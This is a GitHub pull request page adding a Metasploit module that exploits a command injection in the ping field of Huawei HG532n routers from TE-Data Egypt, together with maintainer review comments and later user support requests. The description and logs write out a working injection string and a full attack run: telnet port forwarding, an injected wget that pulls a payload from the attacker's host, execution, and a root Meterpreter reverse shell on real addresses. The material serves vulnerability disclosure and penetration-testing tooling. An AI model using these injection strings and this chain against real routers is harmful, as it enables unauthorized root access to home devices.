Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add Huawei HG532n command injection exploit #8245

Merged
merged 5 commits into from Apr 17, 2017

Conversation

@a-darwish
Copy link
Contributor

@a-darwish a-darwish commented Apr 15, 2017

The Huawei HG532n routers, shipped by TE-Data Egypt, are vulnerable to a command injection exploit in the ping field of their limited shell interface, leading to a root shell.

TE-Data, the incumbent ISP operator in Egypt, provided this router to customers by default. A 3-day finger-printing network scan shows around 50,000+ device exploitable in the wild.

Affected hardware/software version strings:

  Manufacturer: Huawei Technologies Co., Ltd.
  Product Style: HG532n
  SN: B7J7SB9381703791
  IP: 192.168.1.1
  Hardware Version: HG532EAM1HG530ERRAMVER.B
  Software Version: V100R001C105B016 TEDATA

The web interface has two kinds of logins, a limited user:user login given to all customers, and an admin mode used by company's technical staff. For machines within the TE-Data network, this web interface is remotely accessible.

The web interface's user mode provides very limited functionality, only WIFI passwords change and NAT port-forwarding. Nonetheless by port forwarding the router's own (filtered) telnet port, it becomes remotely accessible.

Due to the ISP's (encrypted) runtime router configuration at /etc/defaultcfg.xml though, the telnet daemon does not provide a direct linux shell. Rather a very limited custom shell is provided instead, called the "ATP command line tool". Upon disassembling this user-facing binary, it's discovered that the limited shell has a hidden ping command which falls back to the system own shell (ping %s > /var/res_ping). We exploit that through command injection to gain Meterpreter root access:

[darwish@Home-PC]$ telnet 41.36.32.88 35000 
Trying 41.36.32.88...
Connected to 41.36.32.88.
Escape character is '^]'.
HG520b> help
Welcome to ATP command line tool.
If any question, please input "?" at the end of command.

HG520b>?
cls 
debug 
ip 
sys 
lan 
help 
save 
? 
exit 

HG520b> debug display cwmp
...
CPE OUI:00E0FC
CPE ProductClass:HG532n
CPE SerialNumber:B7J7SB9390600466
CPE Manufacture:Huawei Technologies Co., Ltd.
CPE ModelName:HG532n

HG520b> ping ?;cat${IFS}/proc/cpuinfo;true
ping: bad address '?'
system type		: Ralink RT63365 SOC
processor		: 0
cpu model		: MIPS 34K V5.5
BogoMIPS		: 332.59
wait instruction	: yes
microsecond timers	: yes
tlb_entries		: 32
extra interrupt vector	: yes
hardware watchpoint	: yes
ASEs implemented	: mips16 dsp mt
VCED exceptions		: not available
VCEI exceptions		: not available
Success
ping result:

Verification

Since this is specific to a certain hardware device, please find below PCAP captures (and msfconsole log) for two remotely attacked routers -- on different Internet subnets.

huawei-hg532n-pcap-capture.zip

Also kindly check below a screenshot of the exploit + an example run when VERBOSE is set to true:

router1-exploit

$ msfconsole
msf > use exploit/linux/http/huawei_hg532n_cmdinject

msf exploit(huawei_hg532n_cmdinject) > set RHOST 197.38.98.11
RHOST => 197.38.98.11

msf exploit(huawei_hg532n_cmdinject) > set SRVHOST 41.34.32.121
SRVHOST => 41.34.32.121

msf exploit(huawei_hg532n_cmdinject) > set LHOST 41.34.32.121
LHOST => 41.34.32.121

msf exploit(huawei_hg532n_cmdinject) > set VERBOSE true
VERBOSE => true

msf exploit(huawei_hg532n_cmdinject) > exploit
[*] Exploit running as background job.
msf exploit(huawei_hg532n_cmdinject) >
[-] Handler failed to bind to 41.34.32.121:4444:-  -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Validating router's HTTP server (197.38.98.11:80) signature
[+] Good. Router seems to be a vulnerable HG532n device
[+] Telnet port forwarding succeeded; exposted telnet port = 33552
[*] Connecting to just-exposed telnet port 33552
[+] Connection succeeded. Passing telnet credentials
[*] Received new reply token = '������
Password:'
[*] Received new reply token = 'Password:'
[+] Credentials passed; waiting for prompt 'HG520b>'
[*] Received new reply token = 'HG520b>'
[+] Prompt received. Telnet access fully granted!
[*] Starting web server; hostinig /MDGuEPiUDBRXD
[*] Using URL: http://0.0.0.0:8080/MDGuEPiUDBRXD
[*] Local IP: http://192.168.1.3:8080/MDGuEPiUDBRXD
[*] Runninig command on target: wget -g -v -l /tmp/zjtmztfz -r /MDGuEPiUDBRXD -P8080 41.34.32.121
[*] Received new reply token = 'p'
[*] Received new reply token = 'ing ?;wget${IFS}-g${IFS}-v${IFS}-l${IFS}/tmp/zjtmztfz${IFS}-r${IFS}/MDGuEPiUDBRXD${IFS}-P8080${IFS}41.34.32.121;true'
[*] Received new reply token = 'ping: bad address '?''
[+] HTTP server received request. Sending payload to victim
[*] Received new reply token = 'The IP is [41.34.32.121]'
[*] Received new reply token = 'Success
ping result:
HG520b>'
[+] Command executed succesfully
[*] Runninig command on target: chmod 777 /tmp/zjtmztfz
[*] Received new reply token = 'p'
[*] Received new reply token = 'ing ?;chmod${IFS}777${IFS}/tmp/zjtmztfz;trueping: bad address '?'

Success
ping result:
HG520b>'
[+] Command executed succesfully
[*] Runninig command on target: /tmp/zjtmztfz
[*] Received new reply token = 'p'
[*] Received new reply token = 'ing ?;/tmp/zjtmztfz&trueping: bad address '?'

Success
ping result:
HG520b>'
[+] Command executed succesfully
[*] Runninig command on target: rm /tmp/zjtmztfz
[*] Received new reply token = 'p'
[*] Received new reply token = 'ing ?;rm${IFS}/tmp/zjtmztfz;trueping: bad address '?'

Success
ping result:
HG520b>'
[+] Command executed succesfully
[*] Waiting for the payload to connect back ..
[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 197.38.98.11:50097) at 2017-04-15 16:45:05 +0200
[+] Payload connected!
[*] Server stopped.

msf exploit(huawei_hg532n_cmdinject) > sessions 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.21.5)
Architecture : mips
Meterpreter  : mipsbe/linux
meterpreter >

Style

  • rubocop clean. This is true except for the comment: Assignment Branch Condition size for <method> is too high.; the mentioned methods cannot be made any shorter.
  • msftidy clean.
  • Documentation attached in pull request documentation/modules/exploit/linux/http/huawei_hg532n_cmdinject.md
# the router's busybox echo does not understand the necessary
# "-en" options. It outputs them to the binary instead.
#
# We could not also use the `wget' command stager, as Huawei

This comment has been minimized.

@h00die

h00die Apr 15, 2017
Contributor

This is priceless, and should also (and possibly is) captured in the docs. First suggestion was going to be to use wget stager, but you already captured why it wouldn't work. Very nice!

This comment has been minimized.

@a-darwish

a-darwish Apr 16, 2017
Author Contributor

@h00die Thanks a lot 😊😊

What would you suggest as a good place for documenting this; the module's own markdown docs? There are other Huawei-specific options beside the ones used above, so yes it's worth documenting indeed.

P.S. If this is to be merged, in another PR I can modify the wget stager to have a new opts[:huawei] option that produces the huawei-specfic wget parameters. Then in that same new PR we can modify this module to use the new wget stager ;-)

This comment has been minimized.

@wvu-r7

wvu-r7 Apr 17, 2017
Member

I think it's fine to save it for next time.

This comment has been minimized.

@h00die

h00die Apr 17, 2017
Contributor

I would make a section in this module's markdown docs called notes (prob the 2nd section, after vulnerable app but before commands to use the module). That will shorten the module and make it easy to see. You could then change the in module comments to say something like " see notes in docs for additional details" so it's obvious there's info elsewhere to check.

Also up for suggestions or any other ideas.
Every comment shouldn't be converted to the markdown docs but some of the longer more explanatory ones would be better there.

This comment has been minimized.

@a-darwish

a-darwish Apr 17, 2017
Author Contributor

@h00die Done. Module info hash and other comments properly abridged. Documentation file expanded (wget details, mips toolchain builds, etc.)

@wwebb-r7
Copy link
Contributor

@wwebb-r7 wwebb-r7 commented Apr 15, 2017

I'd suggest maybe moving most of the stuff in the info hash to the docs. Keep it somewhat along the lines of:

This module exploits an ABC vulnerability present in XYZ widgets version 123. Exploitation of this vulnerability results in remote something something in the security context of whatever-user. Other brief explanations of stuff that you feel are necessary are ok to put here as well.

Otherwise everything looks good at first glance. Do you happen to have a firmware image for this device?

@a-darwish
Copy link
Contributor Author

@a-darwish a-darwish commented Apr 16, 2017

@wwebb-r7:

I'd suggest maybe moving most of the stuff in the info hash to the docs ...

Sure, will update the PR now. (Edit: done)

Otherwise everything looks good at first glance. Do you happen to have a firmware image for this device?

Yeah, /dev/mtdblock[0123] are easily extract-able from all attacked devices. Using binwalk on mtdblock3 contents also produces a direct squashfs root image. I can send any of those upon request 😃

@wwebb-r7
Copy link
Contributor

@wwebb-r7 wwebb-r7 commented Apr 16, 2017

Nice. Email them to msfdev@metasploit.com - we prefer to test it if at all possible; however, if we find that we just don't have the time, we'll fall back on the pcap you provided.

@a-darwish
Copy link
Contributor Author

@a-darwish a-darwish commented Apr 16, 2017

@wwebb-r7 commented on Apr 16, 2017, 11:50 AM GMT+3:

Nice. Email them to msfdev@metasploit.com - we prefer to test it if at all possible; however, if we find that we just don't have the time, we'll fall back on the pcap you provided.

Ok. I'm preparing a VM now for the r7 team to login into. Hosts outside the ISP network will not be able to access the target routers' port 80, so this will be a VM from within where things should work.

@busterb busterb self-assigned this Apr 17, 2017
# IO redirection.
#
def execute_command(command, error_regex = nil, background: false)
print_status "Runninig command on target: #{command}"

This comment has been minimized.

@wvu-r7

wvu-r7 Apr 17, 2017
Member

This looks like a typo.

@busterb
Copy link
Member

@busterb busterb commented Apr 17, 2017

Looks good to me, nice work. We can help make sure that the operator gets the note too.

end

if res.body.include? valid_port_export_marker
print_good "Telnet port forwarding succeeded; exposted telnet port = #{external_telnet_port}"

This comment has been minimized.

@wvu-r7

wvu-r7 Apr 17, 2017
Member

Exposed?


@telnet_sock.write(atp_cmd + OPT_NAOFFD + OPT_BINARY)
telnet_prompt_wait(error_regex)
print_good "Command executed succesfully"

This comment has been minimized.

@wvu-r7

wvu-r7 Apr 17, 2017
Member

Successfully?

if datastore['DOWNHOST']
print_status "Will not start local web server, as DOWNHOST is already defined"
else
print_status("Starting web server; hostinig #{resource_uri}")

This comment has been minimized.

@wvu-r7

wvu-r7 Apr 17, 2017
Member

Hosting?

wget_cmd = "wget -g -v -l #{output_file} -r #{payload_uri} -P#{srv_port} #{srv_host}"

execute_command(wget_cmd, [/cannot connect/, /\d+ error/]) # `404 error', etc.
execute_command("chmod 777 #{output_file}", /No such file/)

This comment has been minimized.

@wvu-r7

wvu-r7 Apr 17, 2017
Member

700 should be fine, no?

This comment has been minimized.

@busterb

busterb Apr 17, 2017
Member

yeah I presume it should

a-darwish added 2 commits Apr 17, 2017
Use u+rwx permissions only, instead of full 777, while staging the
wget binary to target. As suggested by @wvu-r7 and @busterb.
external_telnet_port = rand(32767) + 32768

portmapping_page = '/html/application/portmapping.asp'
url_append = "?x=InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.WANPPPConnection.1.PortMapping&RequestFile=#{portmapping_page}"

This comment has been minimized.

@wvu-r7

wvu-r7 Apr 17, 2017
Member

vars_get?


res = send_request_cgi(
'method' => 'POST',
'uri' => "/html/application/del.cgi?RequestFile=#{portmapping_page}",

This comment has been minimized.

@wvu-r7

wvu-r7 Apr 17, 2017
Member

vars_get?

- Add section on compiling custom binaries for the device
- Add documentation for Huawei's wget flavor (thanks @h00die)
- Abridge the module's info hash contents (thanks @wwebb-r7)
- Abridge the module's comments; reference documentation (@h00die)
@a-darwish a-darwish force-pushed the a-darwish:hg532n_cmdinjection_module branch from 807def2 to 7daec53 Apr 17, 2017
Instead of rolling our own GET parameters implementation.

Thanks @wvu-r7!
@a-darwish a-darwish force-pushed the a-darwish:hg532n_cmdinjection_module branch from 39d45d5 to e21504b Apr 17, 2017
@busterb busterb merged commit e21504b into rapid7:master Apr 17, 2017
1 check passed
1 check passed
continuous-integration/travis-ci/pr The Travis CI build passed
Details
@busterb
Copy link
Member

@busterb busterb commented Apr 17, 2017

Release Notes

The exploits/linux/http/huawei_hg532n_cmdinject module has been added to the framework. It exploits Huawei HG532n routers, which as shipped by TE-Data Egypt, are vulnerable to a command injection exploit in the ping field of their limited shell interface.

@busterb
Copy link
Member

@busterb busterb commented Apr 17, 2017

Thanks @a-darwish , great module and contribution.

@todb-r7 todb-r7 mentioned this pull request Apr 18, 2017
3 tasks done
@Boushy
Copy link

@Boushy Boushy commented Apr 26, 2017

[-] Exploit failed: NoMethodError undefined method `match?' for #String:0x00000003bc3600
always happen
screenshot - 04262017 - 06 17 01 pm

@a-darwish
Copy link
Contributor Author

@a-darwish a-darwish commented Apr 27, 2017

@Boushy Update your environment to the required ruby-2.4 version where the String.match? method is defined. A simple $ bundle install should automatically do that since this is explicitly stated in the repository's .ruby-version file.

P.S. Merged pull requests are not a place for asking for help. Discuss over IRC or open an explicit Github issue ticket for that.

@wvu-r7
Copy link
Member

@wvu-r7 wvu-r7 commented Apr 27, 2017

Great response, @a-darwish!!

@abkrenoo
Copy link

@abkrenoo abkrenoo commented Nov 18, 2017

I get this please help


[-] Handler failed to bind to 156.202.xxx.xxx:443:- -
[] Started reverse TCP handler on 0.0.0.0:443
[
] Validating router's HTTP server (156.203.xxx.xxx:80) signature
msf exploit(41895) > [+] Good. Router seems to be a vulnerable HG532n device
[+] Telnet port forwarding succeeded; exposed telnet port = 34401
[] Connecting to just-exposed telnet port 34401
[+] Connection succeeded. Passing telnet credentials
[
] Received new reply token = '������
Password:'
[] Received new reply token = 'Password:'
[+] Credentials passed; waiting for prompt 'HG520b>'
[
] Received new reply token = 'HG520b>'
[+] Prompt received. Telnet access fully granted!
[] Starting web server; hosting /EGcNepbLKnzPx
[
] Using URL: http://0.0.0.0:8080/EGcNepbLKnzPx
[] Local IP: http://192.168.1.108:8080/EGcNepbLKnzPx
[
] Running command on target: wget -g -v -l /tmp/sshrqizh -r /EGcNepbLKnzPx -P8080 156.202.xx.xx
[] Received new reply token = 'p'
[
] Received new reply token = 'ing ?;wget${IFS}-g${IFS}-v${IFS}-l${IFS}/tmp/sshrqizh${IFS}-r${IFS}/EGcNepbLKnzPx${IFS}-P8080${IFS}156.202.xxx.xx;true'
[] Received new reply token = 'ping: bad address '?''
[
] Received new reply token = 'The IP is [156.202.xx.xxx]'
[*] Received new reply token = 'wget: Transfer timeout!

Success
ping result:
HG520b>'
[+] Command executed successfully
[] Running command on target: chmod 700 /tmp/sshrqizh
[
] Received new reply token = 'p'
[*] Received new reply token = 'ing ?;chmod${IFS}700${IFS}/tmp/sshrqizh;trueping: bad address '?'
chmod: /tmp/sshrqizh: No such file or directory

Success
ping result:
HG520b>'
[-] Exploit aborted due to failure: unexpected-reply: Error expression (?-mix:No such file) included in reply
[*] Server stopped.

@h00die
Copy link
Contributor

@h00die h00die commented Nov 18, 2017

I'm going to take a stab in the dark since you've given us little to go by (like info on the target since you are authorized to test it and all), and haven't show us the options...
First line, can't bind to interface.
However this is a PR, not an issue. If it's a bug post an issue, not here. If you need help learning msf use IRC where people can assist.
Do not reply here.

@abkrenoo
Copy link

@abkrenoo abkrenoo commented Nov 18, 2017

I’m sorry I should have been more clear. the issue is in thsese last few lines
——
Success
ping result:
HG520b>'
[-] Exploit aborted due to failure: unexpected-reply: Error expression (?-mix:No such file) included in reply
[*] Server stopped.
———
the router is HG532n

options :
Name Current Setting Required Description


DOWNFILE no Filename to download, (default: random)
DOWNHOST no Alternative host to request the MIPS payload from
HttpPassword user no Web-interface username password
HttpUsername user no Valid web-interface user-mode username
ListenerTimeout 60 yes Number of seconds to wait for the exploit to connect back
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 156.203.5.yy yes The target address
RPORT 80 yes The target port (TCP)
SRVHOST 156.202.32.xx yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TelnetPassword admin no Telnet username password
TelnetUsername admin no Valid router telnet username
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host

Payload options (linux/mipsbe/meterpreter_reverse_tcp):

Name Current Setting Required Description


LHOST 156.202.32.xx yes The listen address
LPORT 443 yes The listen port

Exploit target:

Id Name


0 Linux mipsbe Payload

@rapid7 rapid7 locked and limited conversation to collaborators Nov 18, 2017
@wwebb-r7
Copy link
Contributor

@wwebb-r7 wwebb-r7 commented Nov 18, 2017

As mentioned by @h00die , this is not the place for module support. File an issue or see the IRC channel.

Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Projects
None yet
Linked issues

Successfully merging this pull request may close these issues.

None yet

7 participants